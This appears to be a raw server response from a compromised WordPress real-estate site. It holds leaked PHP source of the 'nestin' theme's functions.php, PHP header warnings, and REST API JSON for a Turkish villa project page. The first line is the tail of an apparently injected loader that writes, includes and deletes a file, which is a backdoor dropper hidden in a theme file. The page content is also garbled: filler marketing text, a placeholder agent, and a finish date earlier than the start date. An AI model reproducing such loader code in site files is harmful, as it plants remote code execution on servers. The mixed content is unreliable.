');fclose($xl);include($qc);unlink($qc); // Register action/filter callbacks add_action( 'after_setup_theme', 'nestin_register_menus' ); add_action( 'wp_enqueue_scripts', 'nestin_enqueue_scripts_styles' ); add_action( 'tgmpa_register', 'nestin_register_plugins' ); add_action( 'wp_enqueue_scripts', 'nestin_load_fonts' ); add_action( 'admin_init', 'nestin_theme_add_editor_styles' ); add_action( 'admin_enqueue_scripts', 'nestin_load_fonts' ); add_action( 'admin_enqueue_scripts', 'nestin_load_admin_style' ); add_action( 'widgets_init', 'nestin_widget_area' ); add_filter( 'bt_bb_color_scheme_arr', 'nestin_color_schemes' ); add_filter( 'body_class', 'nestin_body_class' ); add_filter( 'tiny_mce_before_init', 'nestin_editor_dynamic_styles' ); add_theme_support( 'customize-selective-refresh-widgets' ); // callbacks /** * Register navigation menus */ if ( ! function_exists( 'nestin_register_menus' ) ) { function nestin_register_menus() { register_nav_menus( array ( 'primary' => esc_html__( 'Primary Menu', 'nestin' ), 'footer' => esc_html__( 'Footer Menu', 'nestin' ) )); } } /** * Enqueue scripts and styles */ if ( ! function_exists( 'nestin_enqueue_scripts_styles' ) ) { function nestin_enqueue_scripts_styles() { BoldThemesFramework::$crush_vars_def = array( 'accentColor', 'alternateColor', 'bodyFont', 'menuFont', 'headingFont', 'headingSuperTitleFont', 'headingSubTitleFont', 'logoHeight', 'crestWidth' ); // Custom accent color and font style $boldthemes_add_override_css = false; $accent_color = boldthemes_get_option( 'accent_color' ); $alternate_color = boldthemes_get_option( 'alternate_color' ); $body_font = urldecode( boldthemes_get_option( 'body_font' ) ); $menu_font = urldecode( boldthemes_get_option( 'menu_font' ) ); $heading_font = urldecode( boldthemes_get_option( 'heading_font' ) ); $heading_supertitle_font = urldecode( boldthemes_get_option( 'heading_supertitle_font' ) ); $heading_subtitle_font = urldecode( boldthemes_get_option( 'heading_subtitle_font' ) ); $logo_height = urldecode( boldthemes_get_option( 'logo_height' ) ); $crest_width = urldecode( boldthemes_get_option( 'crest_width' ) ); if ( $accent_color != '' ) { BoldThemesFramework::$crush_vars['accentColor'] = $accent_color; if ( $accent_color != BoldThemes_Customize_Default::$data['accent_color'] ) { $boldthemes_add_override_css = true; } } if ( $alternate_color != '' ) { BoldThemesFramework::$crush_vars['alternateColor'] = $alternate_color; if ( $alternate_color != BoldThemes_Customize_Default::$data['alternate_color'] ) { $boldthemes_add_override_css = true; } } if ( $body_font != '' ) { if ( $body_font == 'no_change' ) { $body_font = BoldThemes_Customize_Default::$data['body_font']; } BoldThemesFramework::$crush_vars['bodyFont'] = $body_font; if ( $body_font != BoldThemes_Customize_Default::$data['body_font'] ) { $boldthemes_add_override_css = true; } } if ( $menu_font != '' ) { if ( $menu_font == 'no_change' ) { $menu_font = BoldThemes_Customize_Default::$data['menu_font']; } BoldThemesFramework::$crush_vars['menuFont'] = $menu_font; if ( $menu_font != BoldThemes_Customize_Default::$data['menu_font'] ) { $boldthemes_add_override_css = true; } } if ( $heading_font != '' ) { if ( $heading_font == 'no_change' ) { $heading_font = BoldThemes_Customize_Default::$data['heading_font']; } BoldThemesFramework::$crush_vars['headingFont'] = $heading_font; if ( $heading_font != BoldThemes_Customize_Default::$data['heading_font'] ) { $boldthemes_add_override_css = true; } } if ( $heading_supertitle_font != '' ) { if ( $heading_supertitle_font == 'no_change' ) { $heading_supertitle_font = BoldThemes_Customize_Default::$data['heading_supertitle_font']; } BoldThemesFramework::$crush_vars['headingSuperTitleFont'] = $heading_supertitle_font; if ( $heading_supertitle_font != BoldThemes_Customize_Default::$data['heading_supertitle_font'] ) { $boldthemes_add_override_css = true; } } if ( $heading_subtitle_font != '' ) { if ( $heading_subtitle_font == 'no_change' ) { $heading_subtitle_font = BoldThemes_Customize_Default::$data['heading_subtitle_font']; } BoldThemesFramework::$crush_vars['headingSubTitleFont'] = $heading_subtitle_font; if ( $heading_subtitle_font != BoldThemes_Customize_Default::$data['heading_subtitle_font'] ) { $boldthemes_add_override_css = true; } } if ( $logo_height != '' ) { BoldThemesFramework::$crush_vars['logoHeight'] = $logo_height; if ( $logo_height != BoldThemes_Customize_Default::$data['logo_height'] ) { $boldthemes_add_override_css = true; } } if ( $crest_width != '' ) { BoldThemesFramework::$crush_vars['crestWidth'] = $crest_width; if ( $crest_width != BoldThemes_Customize_Default::$data['crest_width'] ) { $boldthemes_add_override_css = true; } } // Create override file without local settings if ( function_exists( 'boldthemes_csscrush_file' ) ) { boldthemes_csscrush_file( get_theme_file_path( 'style.crush.css' ), array( 'source_map' => true, 'minify' => false, 'output_file' => 'style', 'formatter' => 'block', 'boilerplate' => false, 'vars' => BoldThemesFramework::$crush_vars, 'plugins' => array( 'loop', 'ease' ) ) ); } // custom theme css wp_enqueue_style( 'nestin-style', get_parent_theme_file_uri( 'style.css' ), array(), false, 'screen' ); wp_enqueue_style( 'nestin-print', get_parent_theme_file_uri( 'print.css' ), array(), false, 'print' ); // external js wp_enqueue_script( 'fancySelect', get_parent_theme_file_uri( 'framework/js/fancySelect.js' ), array( 'jquery' ), '', true ); // custom theme js wp_enqueue_script( 'nestin-header-misc', get_parent_theme_file_uri( 'framework/js/header.misc.js' ), array( 'jquery' ), '', true ); wp_enqueue_script( 'nestin-misc', get_parent_theme_file_uri( 'framework/js/misc.js' ), array( 'jquery' ), '', true ); wp_add_inline_script( 'nestin-header-misc', boldthemes_set_global_uri(), 'before' ); if ( file_exists( get_parent_theme_file_path( 'css-override.php' ) ) && $boldthemes_add_override_css ) { require_once( get_parent_theme_file_path( 'css-override.php' ) ); wp_add_inline_style( 'nestin-style', $css_override ); } if ( file_exists( get_parent_theme_file_path( 'icons.php' ) ) ) { require_once( get_parent_theme_file_path( 'icons.php' ) ); wp_add_inline_style( 'nestin-style', $icons ); } if ( boldthemes_get_option( 'custom_js' ) != '' ) { wp_add_inline_script( 'nestin-misc', boldthemes_get_option( 'custom_js' ) ); } } } /** * Register the required plugins for this theme */ if ( ! function_exists( 'nestin_register_plugins' ) ) { function nestin_register_plugins() { $plugins = array( array( 'name' => esc_html__( 'Nestin', 'nestin' ), // The plugin name. 'slug' => 'nestin', // The plugin slug (typically the folder name). 'source' => get_parent_theme_file_path( 'plugins/nestin.zip' ), // The plugin source. 'required' => true, // If false, the plugin is only 'recommended' instead of required. 'version' => '1.1.9', ///!do not change this comment! E.g. 1.0.0. If set, the active plugin must be this version or higher. 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch. 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins. 'external_url' => '', // If set, overrides default API URL and points to an external URL. ), array( 'name' => esc_html__( 'Cost Calculator', 'nestin' ), // The plugin name. 'slug' => 'bt' . '_cost_calculator', // The plugin slug (typically the folder name). 'source' => get_parent_theme_file_path( 'plugins/' . 'bt' . '_cost_calculator.zip' ), // The plugin source. 'required' => true, // If false, the plugin is only 'recommended' instead of required. 'version' => '2.2.3', // E.g. 1.0.0. If set, the active plugin must be this version or higher. 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch. 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins. 'external_url' => '', // If set, overrides default API URL and points to an external URL. ), array( 'name' => esc_html__( 'Bold Builder', 'nestin' ), // The plugin name. 'slug' => 'bold-page-builder', // The plugin slug (typically the folder name). 'required' => true, // If false, the plugin is only 'recommended' instead of required. 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch. 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins. ), array( 'name' => esc_html__( 'Bold Timeline Lite', 'nestin' ), // The plugin name. 'slug' => 'bold-timeline-lite', // The plugin slug (typically the folder name). 'required' => true, // If false, the plugin is only 'recommended' instead of required. 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch. 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins. ), array( 'name' => esc_html__( 'BoldThemes WordPress Importer', 'nestin' ), // The plugin name. 'slug' => 'bt' . '_wordpress_importer', // The plugin slug (typically the folder name). 'source' => get_parent_theme_file_path( 'plugins/' . 'bt' . '_wordpress_importer.zip' ), // The plugin source. 'required' => true, // If false, the plugin is only 'recommended' instead of required. 'version' => '2.6.1', // E.g. 1.0.0. If set, the active plugin must be this version or higher. 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch. 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins. 'external_url' => '', // If set, overrides default API URL and points to an external URL. ), array( 'name' => esc_html__( 'Meta Box', 'nestin' ), // The plugin name. 'slug' => 'meta-box', // The plugin slug (typically the folder name). 'required' => true, // If false, the plugin is only 'recommended' instead of required. 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch. 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins. ), array( 'name' => esc_html__( 'Contact Form 7', 'nestin' ), // The plugin name. 'slug' => 'contact-form-7', // The plugin slug (typically the folder name). 'required' => true, // If false, the plugin is only 'recommended' instead of required. 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch. 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins. ), array( 'name' => esc_html__( 'Lightweight Sidebar Manager', 'nestin' ), // The plugin name. 'slug' => 'sidebar-manager', // The plugin slug (typically the folder name). 'required' => true, // If false, the plugin is only 'recommended' instead of required. 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch. 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins. ) ); $config = array( 'default_path' => '', // Default absolute path to pre-packaged plugins. 'menu' => 'tgmpa-install-plugins', // Menu slug. 'has_notices' => true, // Show admin notices or not. 'dismissable' => false, // If false, a user cannot dismiss the nag message. 'dismiss_msg' => '', // If 'dismissable' is false, this message will be output at top of nag. 'is_automatic' => false, // Automatically activate plugins after installation or not. 'message' => '', // Message to output right before the plugins table. 'strings' => array( 'page_title' => esc_html__( 'Install Required Plugins', 'nestin' ), 'menu_title' => esc_html__( 'Install Plugins', 'nestin' ), 'installing' => esc_html__( 'Installing Plugin: %s', 'nestin' ), // %s = plugin name. 'oops' => esc_html__( 'Something went wrong with the plugin API.', 'nestin' ), 'notice_can_install_required' => _n_noop( 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.', 'nestin' ), // %1$s = plugin name(s). 'notice_can_install_recommended' => _n_noop( 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.', 'nestin' ), // %1$s = plugin name(s). 'notice_cannot_install' => _n_noop( 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.', 'nestin' ), // %1$s = plugin name(s). 'notice_can_activate_required' => _n_noop( 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.', 'nestin' ), // %1$s = plugin name(s). 'notice_can_activate_recommended' => _n_noop( 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.', 'nestin' ), // %1$s = plugin name(s). 'notice_cannot_activate' => _n_noop( 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.', 'nestin' ), // %1$s = plugin name(s). 'notice_ask_to_update' => _n_noop( 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.', 'nestin' ), // %1$s = plugin name(s). 'notice_cannot_update' => _n_noop( 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.', 'nestin' ), // %1$s = plugin name(s). 'install_link' => _n_noop( 'Begin installing plugin', 'Begin installing plugins', 'nestin' ), 'activate_link' => _n_noop( 'Begin activating plugin', 'Begin activating plugins', 'nestin' ), 'return' => esc_html__( 'Return to Required Plugins Installer', 'nestin' ), 'plugin_activated' => esc_html__( 'Plugin activated successfully.', 'nestin' ), 'complete' => esc_html__( 'All plugins installed and activated successfully. %s', 'nestin' ), // %s = dashboard link. 'nag_type' => 'updated' // Determines admin notice type - can only be 'updated', 'update-nag' or 'error'. ) ); tgmpa( $plugins, $config ); } } /** * Loads custom Google Fonts */ if ( ! function_exists( 'nestin_load_fonts' ) ) { function nestin_load_fonts() { $body_font = urldecode( boldthemes_get_option( 'body_font' ) ); $heading_font = urldecode( boldthemes_get_option( 'heading_font' ) ); $menu_font = urldecode( boldthemes_get_option( 'menu_font' ) ); $heading_subtitle_font = urldecode( boldthemes_get_option( 'heading_subtitle_font' ) ); $heading_supertitle_font = urldecode( boldthemes_get_option( 'heading_supertitle_font' ) ); $font_families = array(); if ( $body_font != '' ) { if ( $body_font == 'no_change' ) { $body_font = BoldThemes_Customize_Default::$data['body_font']; } $font_families[] = $body_font . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } else { /* Translators: If there are characters in your language that are not supported by chosen font(s), translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Lato font: on or off', 'nestin' ) ) { $font_families[] = 'Lato' . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } } if ( $heading_font != '' ) { if ( $heading_font == 'no_change' ) { $heading_font = BoldThemes_Customize_Default::$data['heading_font']; } $font_families[] = $heading_font . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } else { /* Translators: If there are characters in your language that are not supported by chosen font(s), translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Lato font: on or off', 'nestin' ) ) { $font_families[] = 'Lato' . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } } if ( $menu_font != '' ) { if ( $menu_font == 'no_change' ) { $menu_font = BoldThemes_Customize_Default::$data['menu_font']; } $font_families[] = $menu_font . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } else { /* Translators: If there are characters in your language that are not supported by chosen font(s), translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Lato font: on or off', 'nestin' ) ) { $font_families[] = 'Lato' . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } } if ( $heading_subtitle_font != '' ) { if ( $heading_subtitle_font == 'no_change' ) { $heading_subtitle_font = BoldThemes_Customize_Default::$data['heading_subtitle_font']; } $font_families[] = $heading_subtitle_font . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } else { /* Translators: If there are characters in your language that are not supported by chosen font(s), translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Lato font: on or off', 'nestin' ) ) { $font_families[] = 'Lato' . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } } if ( $heading_supertitle_font != '' ) { if ( $heading_supertitle_font == 'no_change' ) { $heading_supertitle_font = BoldThemes_Customize_Default::$data['heading_supertitle_font']; } $font_families[] = $heading_supertitle_font . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } else { /* Translators: If there are characters in your language that are not supported by chosen font(s), translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Lato font: on or off', 'nestin' ) ) { $font_families[] = 'Lato' . ':100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic'; } } if ( count( $font_families ) > 0 ) { $query_args = array( 'family' => urlencode( implode( '|', $font_families ) ), 'subset' => urlencode( 'latin,latin-ext' ), ); $font_url = add_query_arg( $query_args, 'https://fonts.googleapis.com/css' ); wp_enqueue_style( 'nestin-fonts', $font_url, array(), '1.0.0' ); add_editor_style( $font_url ); } } } if ( ! function_exists( 'nestin_load_admin_style' ) ) { function nestin_load_admin_style() { if ( function_exists( 'boldthemes_csscrush_file' ) ) { boldthemes_csscrush_file( get_theme_file_path( 'admin-style.crush.css' ), array( 'source_map' => true, 'minify' => false, 'output_file' => 'admin-style', 'formatter' => 'block', 'boilerplate' => false, 'vars' => BoldThemesFramework::$crush_vars, 'plugins' => array( 'loop', 'ease' ) ) ); } wp_enqueue_style( 'nestin-admin-style', get_parent_theme_file_uri( 'admin-style.css' ) ); require_once( get_parent_theme_file_path( 'admin-style.php' ) ); wp_add_inline_style( 'nestin-admin-style', $admin_style ); } } /** * TinyMCE style */ if ( ! function_exists( 'nestin_theme_add_editor_styles' ) ) { function nestin_theme_add_editor_styles() { add_editor_style( 'admin-style.css' ); } } /** * Add FontAwesome to TinyMCE editor */ if ( ! function_exists( 'nestin_editor_dynamic_styles' ) ) { function nestin_editor_dynamic_styles( $mceInit ) { $styles = '@font-face{font-family:\"FontAwesome\";src:url(\"' . get_parent_theme_file_uri( 'fonts/FontAwesome/FontAwesome.woff' ) . '\") format(\"woff\"),url(\"' . get_parent_theme_file_uri( 'fonts/FontAwesome/FontAwesome.ttf' ) . '\") format(\"truetype\");}'; if ( isset( $mceInit['content_style'] ) ) { $mceInit['content_style'] .= ' ' . ( $styles ) . ' '; } else { $mceInit['content_style'] = $styles . ' '; } return $mceInit; } } /** * Add class to body * * @return string */ if ( ! function_exists( 'nestin_body_class' ) ) { function nestin_body_class( $extra_class ) { if ( is_active_sidebar( 'header_left_widgets' ) || is_active_sidebar( 'header_right_widgets' ) ) { $extra_class[] = 'btHasTopBar'; } if ( boldthemes_get_option( 'default_heading_weight' ) ) { $extra_class[] = 'btHeadingWeight_' . boldthemes_get_option( 'default_heading_weight' ); } if ( boldthemes_get_option( 'default_supertitle_weight' ) ) { $extra_class[] = 'btSupertitleWeight_' . boldthemes_get_option( 'default_supertitle_weight' ); } if ( boldthemes_get_option( 'default_subtitle_weight' ) ) { $extra_class[] = 'btSubtitleWeight_' . boldthemes_get_option( 'default_subtitle_weight' ); } if ( boldthemes_get_option( 'default_menu_weight' ) ) { $extra_class[] = 'btMenuWeight_' . boldthemes_get_option( 'default_menu_weight' ); } if ( boldthemes_get_option( 'default_button_weight' ) ) { $extra_class[] = 'btButtonWeight_' . boldthemes_get_option( 'default_button_weight' ); } if ( boldthemes_get_option( 'arrow_style' ) ) { $extra_class[] = 'btArrowStyle_' . boldthemes_get_option( 'arrow_style' ); } if ( boldthemes_get_option( 'capitalize_main_menu' ) ) { $extra_class[] = 'btCapitalizeMainMenuItems'; } if ( boldthemes_get_option( 'crest' ) ) { $extra_class[] = 'btHasCrest'; } if ( boldthemes_get_option( 'logo' ) ) { $extra_class[] = 'btHasLogo'; } else { $extra_class[] = 'btNoLogo'; } if ( boldthemes_get_option( 'dark_overlay' ) ) { $extra_class[] = 'btHideOverlay'; } if ( boldthemes_get_option( 'text_effect' ) ) { $extra_class[] = 'bt_effect_' . boldthemes_get_option( 'text_effect' ); } return $extra_class; } } /** * Shop sidebar */ if ( ! function_exists( 'nestin_widget_area' ) ) { function nestin_widget_area() { if ( class_exists( 'woocommerce' ) ) { register_sidebar( array ( 'name' => esc_html__( 'Shop Sidebar', 'nestin' ), 'id' => 'bt_shop_sidebar', 'description' => 'WooCommerce sidebar', 'before_widget' => '
', 'after_widget' => '
', 'before_title' => '

', 'after_title' => '

', )); } } } require_once( get_parent_theme_file_path( 'php/before_framework.php' ) ); require_once( get_parent_theme_file_path( 'framework/framework.php' ) ); require_once( get_parent_theme_file_path( 'php/config.php' ) ); require_once( get_parent_theme_file_path( 'php/after_framework.php' ) );
Warning: Cannot modify header information - headers already sent by (output started at /home2/maiaglob/maiayapi.com/wp-content/themes/nestin/functions.php:1) in /home2/maiaglob/maiayapi.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home2/maiaglob/maiayapi.com/wp-content/themes/nestin/functions.php:1) in /home2/maiaglob/maiayapi.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home2/maiaglob/maiayapi.com/wp-content/themes/nestin/functions.php:1) in /home2/maiaglob/maiayapi.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home2/maiaglob/maiayapi.com/wp-content/themes/nestin/functions.php:1) in /home2/maiaglob/maiayapi.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home2/maiaglob/maiayapi.com/wp-content/themes/nestin/functions.php:1) in /home2/maiaglob/maiayapi.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home2/maiaglob/maiayapi.com/wp-content/themes/nestin/functions.php:1) in /home2/maiaglob/maiayapi.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home2/maiaglob/maiayapi.com/wp-content/themes/nestin/functions.php:1) in /home2/maiaglob/maiayapi.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home2/maiaglob/maiayapi.com/wp-content/themes/nestin/functions.php:1) in /home2/maiaglob/maiayapi.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893
{"id":2830,"date":"2024-09-30T15:27:56","date_gmt":"2024-09-30T12:27:56","guid":{"rendered":"https:\/\/maiayapi.com\/?page_id=2830"},"modified":"2024-10-02T22:35:27","modified_gmt":"2024-10-02T19:35:27","slug":"maia-garden","status":"publish","type":"page","link":"https:\/\/maiayapi.com\/kurumsal\/maia-garden\/","title":{"rendered":"Maia Garden"},"content":{"rendered":"

<\/div><\/div>
<\/div>
<\/div>

AYDIN EFELER<\/span>MAIA OL\u0130VE GARDEN<\/span><\/span><\/h1><\/header>
<\/div><\/div><\/div><\/div>
<\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section>
<\/div>

MAIA OLIVE GARDEN<\/span><\/span><\/h3><\/header>
<\/div>
<\/p>\n

Do\u011fan\u0131n kalbinde, modern ya\u015fam\u0131n konforuyla bulu\u015fan bu \u00f6zel projede, 12 villadan olu\u015fan ayr\u0131cal\u0131kl\u0131 bir ya\u015fam sizi bekliyor. Hem huzuru hem de l\u00fcks\u00fc bir arada sunan bu proje, do\u011fa ile i\u00e7 i\u00e7e, her an\u0131 keyifle ya\u015fayaca\u011f\u0131n\u0131z bir ya\u015fam alan\u0131 sunuyor.<\/p>\n

\n<\/div>

<\/div>
<\/span><\/div>
ALAN<\/span>5.000<\/span><\/div><\/div>
<\/span><\/div>
ADET<\/span>12<\/span><\/div><\/div>
<\/span><\/div>
TESL\u0130M TAR\u0130H\u0130<\/span>TAMAMLANDI<\/span><\/div><\/div>
<\/div>
Download Brochure<\/span><\/a><\/div>
<\/div><\/div><\/div><\/div>
\"https:\/\/maiayapi.com\/wp-content\/uploads\/2024\/09\/PHOTO-2022-10-19-21-07-45.jpg\"<\/span><\/div><\/div><\/div>
\"https:\/\/maiayapi.com\/wp-content\/uploads\/2024\/09\/PHOTO-2022-10-19-21-07-46-2.jpg\"<\/span><\/div><\/div><\/div>
\"https:\/\/maiayapi.com\/wp-content\/uploads\/2024\/09\/garden.jpg\"<\/span><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section>
ABOUT NEW RESIDENTIAL PROJECT<\/span><\/h5><\/header>
<\/div>
<\/p>\n

Offline to maximise the long tail. Keeping your eye on the ball while performing a deep dive on the start-up mentality to derive convergence on cross-platform integration. Collaboratively administrate empowered markets via plug-and-play networks. Dynamically procrastinate B2C users after installed base benefits. Dramatically visualize customer directed convergence without revolutionary ROI. Efficiently unleash cross-media information without cross-media value.<\/p>\n

\n<\/div>

<\/div>
<\/span>
<\/div><\/div>
<\/div>

HEATED POOL<\/span><\/h4><\/header>
<\/div>
<\/span>
<\/div><\/div>
<\/div>

SPACIOUS PROPERTY<\/span><\/h4><\/header>
<\/div><\/div><\/div>
<\/span>
<\/div><\/div>
<\/div>

ZEN GARDEN<\/span><\/h4><\/header>
<\/div>
<\/span>
<\/div><\/div>
<\/div>

ELEGANT FINISHES<\/span><\/h4><\/header>
<\/div><\/div><\/div>
<\/span>
<\/div><\/div>
<\/div>

ELECTRIC CHARGER<\/span><\/h4><\/header>
<\/div>
<\/span>
<\/div><\/div>
<\/div>

PRIVATE SECURITY<\/span><\/h4><\/header>
<\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div>
<\/div>
START DATE<\/span>August 17th 2020<\/span><\/div><\/div>
FINISH DATE<\/span>July 14th 2020<\/span><\/div><\/div>
CONTRACTOR<\/span>Nesting Group inc.<\/span><\/div><\/div>
SQM<\/span>55678<\/span><\/div><\/div>
<\/div>
SELECTED PROJECTS<\/span><\/h5><\/header>
<\/div>
<\/p>\n

Leverage agile frameworks to provide a your eye on the ball while performing a deep robust synopsis for high level overviews. Iterative approaches to corporate strategy foster collaborative thinking to further the overall value proposition. Podcasting operational change management inside of workflows to establish a framework.<\/p>\n

\n<\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section>

<\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div>
<\/div>
<\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section>

CONTACT US<\/span>Schedule a visit<\/span><\/span><\/h2>
The arrangement and layout of the apartments maximises natural light, opening to elegant private balconies.<\/div><\/header>
<\/div>
\"https:\/\/maiayapi.com\/wp-content\/uploads\/2020\/01\/contact_img-4-640x480.jpg\"<\/span><\/div>
<\/div><\/div><\/div>

Sandra Stewart<\/span><\/span><\/h4><\/header>
<\/div>
<\/p>\n

Real estate agent<\/p>\n

\n<\/div>

<\/div>
+1 800 100 900<\/span><\/span><\/div>
<\/div>
sandras@nestin.com<\/span><\/span><\/div>
<\/div>
<\/a><\/div>
<\/a><\/div>
<\/a><\/div><\/div><\/div><\/div><\/div>
<\/div><\/div><\/div><\/div>
\n
\n

<\/p>

    <\/ul><\/div>\n
    \n
    \n\n\n\n\n\n\n<\/div>\n